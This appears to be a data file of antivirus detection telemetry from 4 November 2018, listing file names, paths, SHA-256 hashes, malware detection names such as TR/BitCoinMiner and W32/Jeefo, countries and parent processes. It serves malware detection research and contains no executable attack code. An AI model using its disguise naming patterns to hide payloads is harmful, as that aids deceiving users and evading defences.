  Row(detection=Row(filename='.spotlight-v100.exe', filepath='D:\\.Spotlight-V100.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='disque amovible.exe', filepath='D:\\Disque amovible.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='D:\\\xa0.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nouveau dossier.exe', filepath='D:\\Nouveau dossier.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='test.exe', filepath='D:\\Test.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161806-5630e20b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-161806-5630E20B', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='5fb7ed1e268c301f8c510743bb7b8c756f25b9affcc4d1880f2a5b7f42b18884', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:48:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\users\\X\\downloads\\mcneel rhinoceros 6 6.1.18023.13161\\patch\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4515256, timestamp='2018-11-04T15:24:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\program files\\rhino 6\\system\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:02:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\program files\\rhino 6\\system\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T03:59:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120000-0263910c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a890420\\AVSCAN-20181104-115944-FF0EF3BE\\AVSCAN-20181104-120000-0263910C', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:00:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120125-1430106e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a890420\\AVSCAN-20181104-120111-113E7561\\AVSCAN-20181104-120125-1430106E', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:01:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162443-a053bf10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2539a2\\AVSCAN-20181104-162424-9DA7207E\\AVSCAN-20181104-162443-A053BF10', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:25:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-094842-39adbfee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42352ddd\\AVSCAN-20181104-094440-1D967329\\AVSCAN-20181104-094842-39ADBFEE', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:48:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cosmicbugs.exe', filepath='D:\\العاب\\small games\\Cosmic Bugs\\cosmicbugs.exe', filesize=192000, name='W32/Jeefo.A.#M1.#R1'), hash='60b38631fb18adfdc261bf0fefebe3d3a01869c60e5c34dbe648b1ee5fa55dfa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.exe', parentsize=36352, timestamp='2018-11-04T12:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134810-34ad717f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbc916c1\\AVSCAN-20181104-134639-23D9CC14\\AVSCAN-20181104-134810-34AD717F', filesize=64000, name='W97M/Dldr.Agent.AM.7117126.#M1.#R1'), hash='60c2aa4d30f1a1d84e03cde89c9d16de70071f0bed798a95e309218a8ee64997', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:48:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skm_4050151222162800.doc', filepath='C:\\Users\\X\\AppData\\Local\\EdbMails\\2defbd4a818b221\\SKM_4050151222162800.doc', filesize=64000, name='W97M/Dldr.Agent.AM.7117126.#M1.#R1'), hash='60c2aa4d30f1a1d84e03cde89c9d16de70071f0bed798a95e309218a8ee64997', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\EdbMails\\edbmailspst64.exe', parentsize=554288, timestamp='2018-11-04T11:17:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222110-c4b19d11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-222110-C4B19D11', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_119332d5.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_119332d5.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1575608b.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1575608b.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_163e84e4.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_163e84e4.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_2a489c32.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2a489c32.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1273756b.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1273756b.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_168b8da8.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_168b8da8.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200903-303b815c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200903-303B815C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_10462721.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_10462721.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1c8a1998.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1c8a1998.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_2a95a7d6.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2a95a7d6.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_16d8986c.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_16d8986c.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_2ec4ee40.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2ec4ee40.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1a5dbb5e.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1a5dbb5e.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_25bc4a13.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_25bc4a13.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_11004c89.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_11004c89.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_208c03b8.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_208c03b8.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
